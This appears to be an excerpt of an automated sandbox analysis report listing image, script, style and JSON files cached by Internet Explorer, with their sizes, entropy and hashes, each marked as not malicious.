                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1cG73h[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1131
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.767634475904567
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1ftEY0[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):497
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.316910976448212
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BB1kvzy[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.749452105424938
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBJrII1[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):285
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.817753121237528
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\BBPfCZL[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:GIF image data, version 89a, 50 x 50
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2313
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.594679301225926
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\cfdbd9[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):740
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.552939906140702
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                                                                                                                  MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                                                                                                                  SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                                                                                                                  SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                                                                                                                  SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_b3b730df929ed7084f256b53000dc655[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20805
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.958583012961481
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:qYG1LoUYYUqI7s6G16hfWRskw4xjpfLVAMSDI5wuF7aW13FVfGhc62RaGv3mxkK:ZG1ULcGfWRTVxjRLVAMSM5w87aW13FCn
                                                                                                                                                                                                                                                                                  MD5:54E1A089C81AC4733C601033B8173199
                                                                                                                                                                                                                                                                                  SHA1:C6D1B62F4C75E00ED06F81929D336DBDE62A1920
                                                                                                                                                                                                                                                                                  SHA-256:91D8484713E50908FAD575102FE050DEFF04FF84BCB8760C761BBB581DE976C7
                                                                                                                                                                                                                                                                                  SHA-512:7A15D869B2351A443F313ECD01EE37C33778827553D88DA7C15D8B0B7B1A1FB3A0B3CF2EDA5A8FF9D4AC3FA2AAD906785188A9743F450AF3E9593CD6071151F1
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\http___cdn.taboola.com_libtrc_static_thumbnails_ceedb38b7c05f6380193a62666745514[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):46724
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.982455995889274
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:E9kkdzfIgV219aRWWEj7Z+xIvm7zaEnniSMYLwj2rQgwtutPM6QBQ8/KT4o34q8v:YkwcRSEjcvniiBrQ3tYOy+6QRN
                                                                                                                                                                                                                                                                                  MD5:AFA97CD47E1634980ECB88887F6F02D2
                                                                                                                                                                                                                                                                                  SHA1:9A1EEB307ADAA281EAD0054267A8B04318F114C6
                                                                                                                                                                                                                                                                                  SHA-256:154833E2F983EC646083DA0925C14181464CEA7F5479C8D6D230FFEAE8D7595F
                                                                                                                                                                                                                                                                                  SHA-512:D7B87EEAD9BFF1BF91C63A439A50B860C10A3A6FA8C169C999DA5EC021001F6255456570DB27C48B082AE9646AFFCCFB456205C8E256A1D80C094694F1B0C1D7
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\https___console.brax-cdn.com_creatives_a6cb1edf-85ae-42d3-8ce3-0c3ef2d08771_46fb1684-fb46-4b92-97d6-73c06aebbfee_1000x600_bdf0634e74df9e1a3c17cd78afe8adb9[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):17316
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.972483552868003
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:/8UwnYwsYaH4NsjHt6+U1vTvN9wzQ2Mr6g6tSvGnvhPhaGd:/8UEsYaY2jHBUdTvwsTOlOGvhn
                                                                                                                                                                                                                                                                                  MD5:70E7A9513624839B604443B3B54043D6
                                                                                                                                                                                                                                                                                  SHA1:EBB39B01F83791AD6AD340B6F6D9D038F3417013
                                                                                                                                                                                                                                                                                  SHA-256:86AF417CAB26D48954544DF86D5517906DA599A32CBEF821A394211ED8FA11D3
                                                                                                                                                                                                                                                                                  SHA-512:E4C25B3847A00183E6D9DBBBEB917B1DB1B3B14624F08B7359F8D73486A3FCADABC51E1F38A43E4D7509520F16C7FB1BE237D8DED5714CAC6611DE0461482460
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\https___s3.amazonaws.com_shinez-pictures_1617177826938a14141d3bca4cb41620f72354f58c4ff[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):22382
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.974972742647171
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:EY6JQAiAtg9hi5QZ9Ih/DM05XTbFwbp8EP2UaZ0kCU/KsAw5FaG+XGpqbKgGjgf:p6i/At4i5QZyh7M05XT5wbp8EPUik9Zm
                                                                                                                                                                                                                                                                                  MD5:C8B18C873B56148C17D86E406DFE23DA
                                                                                                                                                                                                                                                                                  SHA1:7C141BB6BB6D5F27FE60A0B0BBE9CD7B8DDD62A7
                                                                                                                                                                                                                                                                                  SHA-256:91BDC156588ACF6767BBB57BDF77AB60321E22EEEF6C2B77BEF81C9B166779AE
                                                                                                                                                                                                                                                                                  SHA-512:549DB901C9738BC6FA6221556057F3F1DA12BCEEB2A6230511BCBDD8DB78F82E33327AFDF6449AA1F776B47966E52B345BB8B12C2C8289F196506CE18CFBA60B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\otPcCenter[1].json
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):47714
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.565687858735718
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:768:4zg/3JXE9ZSqN76pW1lzZzic18+JHoQthI:4zCBceUdZzic18+5xI
                                                                                                                                                                                                                                                                                  MD5:8EC5B25A65A667DB4AC3872793B7ACD2
                                                                                                                                                                                                                                                                                  SHA1:6B67117F21B0EF4B08FE81EF482B888396BBB805
                                                                                                                                                                                                                                                                                  SHA-256:F6744A2452B9B3C019786704163C9E6B3C04F3677A7251751AEFD4E6A556B988
                                                                                                                                                                                                                                                                                  SHA-512:1EDC5702B55E20F5257B23BCFCC5728C4FD0DEB194D4AADA577EE0A6254F3A99B6D1AEDAAAC7064841BDE5EE8164578CC98F63B188C1A284E81594BCC0F20868
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\tag[1].js
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):10157
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.433955043303664
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\17-361657-68ddb2ab[1].js
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1238
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.066474690445609
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\2d-0e97d4-185735b[1].css
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):251398
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2940351809352855
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AA6wTdK[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):550
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.444195674983303
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AALnEih[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):55398
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.96184837377736
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AANf6qa[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):432
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.252548911424453
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AAP9No8[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):16386
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.939385677941581
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:Nv45nQDTBARnxwwffJHDdL/eWGZN3fZDtSvWgBg:NoQ/2RxwML/f+35twFBg
                                                                                                                                                                                                                                                                                  MD5:EDC362FA51B5C80A665339845B24FEA8
                                                                                                                                                                                                                                                                                  SHA1:41C4494EAD75A81245E46BF193427DECF8D1F934
                                                                                                                                                                                                                                                                                  SHA-256:87BEC2FB7E37F5FD6D5B735F8C405FA3F387796B51698740404DC29FCA8942E8
                                                                                                                                                                                                                                                                                  SHA-512:E998030B7DA6AEAE10CA98EE186B75B33721DCC506B4890CE1F26D16C5F05434DA58D7FAB25F1FD75F1C3AEF40EBC414BAA0D1BE345719416998BF94699A5008
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AAPabFF[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):15570
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.961221095311958
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:bwwNmqP2HHVPxDs68utpM7WJ8ixFwR1RabmIX+c93wVqENl:bvLPA15D78W5JZxFwRWmIuc5wXNl
                                                                                                                                                                                                                                                                                  MD5:1435D24291A1285A1494EDF3983CA575
                                                                                                                                                                                                                                                                                  SHA1:670E6BB9AB4EBF50EE1B39DB88CD65C964DD4A02
                                                                                                                                                                                                                                                                                  SHA-256:C0C61051AE9B514834D3469663119085EBB1D0A5C73788039C728177081C6122
                                                                                                                                                                                                                                                                                  SHA-512:2F16BA855246D71B0ECFB127A526F6C5421CF0ABB20D24A047B4803D25D3100F61CF0D6DDA079C49DB1E230F9D71FCC39E467F90DF590504B8917780F094286C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AAPajmd[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):5730
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.799346478449681
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:QfQE8edMuGjlq69hlr7BvpBrGBs/NzU7F2ql6VRZ4kEqTAigzEy2FYS5Urlbh4TK:QoUFnUpHrd67qlEqTARIYcWt4TK
                                                                                                                                                                                                                                                                                  MD5:AFB7D0BDF71DEF69E65EB747640C1C9F
                                                                                                                                                                                                                                                                                  SHA1:ACA040442819B5FD1EDE4C18CA087468F2CE49C6
                                                                                                                                                                                                                                                                                  SHA-256:40087CABD350C3C7792E8AC9855C9FE70CF7C0F4E9D80FECE6BDDF2E67E3B7A3
                                                                                                                                                                                                                                                                                  SHA-512:7DFF955949984074410E8531936010B2B28C42E532817855D69A58F9FCB9DBEE55AE1FCED79B25A2708CB779F6F0786D10B683F52F7D4761A31C96F5186AD770
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AAPasOE[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):15415
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.914445554616545
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:NY47eUS7hZ2XkoFeWi2aebmL/EQAzwfz4xFVeP/OLFnT:N9xHi27bxbMs7f
                                                                                                                                                                                                                                                                                  MD5:F6C2F240CFE67CBF0FC04FD9D30FFAF3
                                                                                                                                                                                                                                                                                  SHA1:0C5E9D97ADB7E33CB95B003BDE4AA4C9871959B7
                                                                                                                                                                                                                                                                                  SHA-256:A12146AC753759754A6D013B82F04B558552E9F7505AD5C3DC53AFCBC802E931
                                                                                                                                                                                                                                                                                  SHA-512:0A8BD848D4DD81A0E6C540BEC6064D9881A4373B80E587ABBF157166E1A1B28B2906D7E3B6B3BECCBB080F4EAF1EE7435DB4966E2BF193A8A99A5E4372CE0489
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AAPaubw[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):7662
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.899260665144134
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:QfQESLku3lsyqAhLcZFbw4uGDMCyU3JxXvcZgCzon7K7sOLZbOAKBVB/pPPXRT:QojkuKQowhGARM9kZVEnu7sWZbOzxX9
                                                                                                                                                                                                                                                                                  MD5:0C127813C36FA4B6DAA87238AF43D2D7
                                                                                                                                                                                                                                                                                  SHA1:2A813FA72F22168CF7FBCCDC4AB58CE9EA8CD231
                                                                                                                                                                                                                                                                                  SHA-256:B2FDFF5CD93087991EDE89EFF0F57A5A586B3B09B204AB16A5E7E5A20834E658
                                                                                                                                                                                                                                                                                  SHA-512:A14832B708536E5040371ED41F74B3AF1A4C12E05A7CFF616133B193EFC6BB0FFEBFCA4A649417048EF092CDD44EBD5A9A614CFA5A0E778F30FF539C42886489
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\AAPawMj[1].jpg
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):15918
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.883595561989866
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:384:N4CI4vEcKt6FJZoSOxA7U2a0SB3ILeiNdw:N431cqUJuSIqUVa7w
                                                                                                                                                                                                                                                                                  MD5:243AA228CED40BA0C9765B012F7E0816
                                                                                                                                                                                                                                                                                  SHA1:E8882596E9BB575A6B622EB233A0FAE04CF41FCF
                                                                                                                                                                                                                                                                                  SHA-256:3909BF0723B337A449C1987869CE27F4439BA6BE35EC267E49501AD420C02B9F
                                                                                                                                                                                                                                                                                  SHA-512:D8DBCB31337FFD76DF53A66B10E570FCA9EF98C4E97240CCF92AA96B0BF5B349A128281B22AA0820E5AFA99D30DCA3EB88A2944B4E2FB0DA8D74E7B54E5F712B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB10MkbM[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):936
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.711185429072882
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:IJJuYNKuGlZLocJZlxAgAbiuoSrZzi1g3+:IJn94F/lxAZiuoSNYgO
                                                                                                                                                                                                                                                                                  MD5:19B9391F3CA20AA5671834C668105A22
                                                                                                                                                                                                                                                                                  SHA1:81C2522FC7C808683191D2469426DFC06100F574
                                                                                                                                                                                                                                                                                  SHA-256:3557A603145306F90828FF3EA70902A1822E8B117F4BDF39933A2A413A79399F
                                                                                                                                                                                                                                                                                  SHA-512:0E4BA430498B10CE0622FF745A4AE352FDA75E44C50C7D5EBBC270E68D56D8750CE89435AE3819ACA7C2DD709264E71CE7415B7EBAB24704B83380A5B99C66DC
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB116fUs[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):458
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.210742812446173
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:6v/7XBvDtGBGFqRb8EJYYkQfCtK3Ir3v98:UtDEBYqV8E7k6V+F8
                                                                                                                                                                                                                                                                                  MD5:2343404EAEB895F56B8EA1C57104CC46
                                                                                                                                                                                                                                                                                  SHA1:C3A894822DEB625BBEC44E58194DE48CDA7A133F
                                                                                                                                                                                                                                                                                  SHA-256:CCABAA94321280B2F25C0937FC67E13227150D42A81DBCDF073DBC1F8B0F41D9
                                                                                                                                                                                                                                                                                  SHA-512:8953413DE432A1DEC0E59A64316338FB699BAB2FFBB1FA63AD99CA1E131D4220C9005E446C8F2BAA737CE91174820258EFD95B0361D9EDBBCD4108F7E0909835
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB1fdtSt[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                  Size (bytes):438
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.245257101036661
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:6v/7DHVT2T6ESAN2ISAy22UaU8Pa7+/LB:4Tq0AN2IjyPaqV
                                                                                                                                                                                                                                                                                  MD5:3F46112E8E54A82D0D7F8883CF12A86F
                                                                                                                                                                                                                                                                                  SHA1:AA1A3340F167A655D0A0A087D0F6CBF98026296C
                                                                                                                                                                                                                                                                                  SHA-256:E447211712478A81E419A9794678B6377AE3ACA057DEA78FC9EF6A971E652CFB
                                                                                                                                                                                                                                                                                  SHA-512:EBBF357EF6B388E4BD1B261D51DE923D15DBF3AC4740874BEBDEF336BB8133C3B63AEA9D8D95D2D1A044F6E43B7DD654586661462C9239E4FFA6B8328E6B49A6
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\BB7hg4[1].png
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):470
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.360134959630715
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:6v/7TIG/Kupc9GcBphmZgPEHfMwY7yWQtygnntrNKKBBN:3KKEc9GcXhmZwM9LtyGJKKBBN
                                                                                                                                                                                                                                                                                  MD5:B6EA6C62BAEBF35525A53599C0D6F151
                                                                                                                                                                                                                                                                                  SHA1:4FFEFB243AAEC286D37B855FBE33C790795B1896
                                                                                                                                                                                                                                                                                  SHA-256:71CC7A3782241824ACDC2D6759E455399957E3C7C9433A1712C3947E2890A4D4
                                                                                                                                                                                                                                                                                  SHA-512:0E4E87A66CF6E01750BC34D2D1EC5B63494A7F5C4B831935DD00E1D825CDB1CFD3C3E90F29D1D4076E7F24C9C287E59BE23627D748DB05FB433A3A535F115464
                                                                                                                                                                                                                                                                                  Malicious:false
